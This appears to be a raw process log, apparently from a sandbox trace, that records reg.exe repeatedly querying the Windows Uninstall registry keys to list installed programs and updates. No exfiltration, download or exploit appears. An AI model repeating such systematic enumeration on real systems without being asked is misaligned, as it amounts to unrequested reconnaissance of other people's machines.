C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge Update"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft EdgeWebView"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4d8dcf8c-a72a-43e1-9833-c12724db736e}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{61087a79-ac85-455c-934d-1fa22cc64f36}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{63880b41-04fc-4f9b-92c4-4455c255eb8c}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{7DAD0258-515C-3DD4-8964-BD714199E0F7}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{B175520C-86A2-35A7-8619-86DC379688B9}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BF08E976-B92E-4336-B56F-2171179476C4}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d87ae0f4-64a6-4b94-859a-530b9c313c27}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{E30D8B21-D82D-3211-82CC-0F0A5D1495E8}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef5af41f-d68c-48f7-bfb0-5055718601fc}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F6080405-9FA8-4CAA-9982-14E95D1A3DAC}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\36c3a589-07cb-5a5c-93f2-7ca0c417a328

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 124.0.2 (x64 en-US)"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{71024AE4-039E-4CA4-87B4-2F64180401F0}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge Update"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft EdgeWebView"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4d8dcf8c-a72a-43e1-9833-c12724db736e}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{61087a79-ac85-455c-934d-1fa22cc64f36}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{63880b41-04fc-4f9b-92c4-4455c255eb8c}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{7DAD0258-515C-3DD4-8964-BD714199E0F7}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{B175520C-86A2-35A7-8619-86DC379688B9}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BF08E976-B92E-4336-B56F-2171179476C4}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d87ae0f4-64a6-4b94-859a-530b9c313c27}

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{E30D8B21-D82D-3211-82CC-0F0A5D1495E8}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef5af41f-d68c-48f7-bfb0-5055718601fc}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F6080405-9FA8-4CAA-9982-14E95D1A3DAC}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\36c3a589-07cb-5a5c-93f2-7ca0c417a328

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX

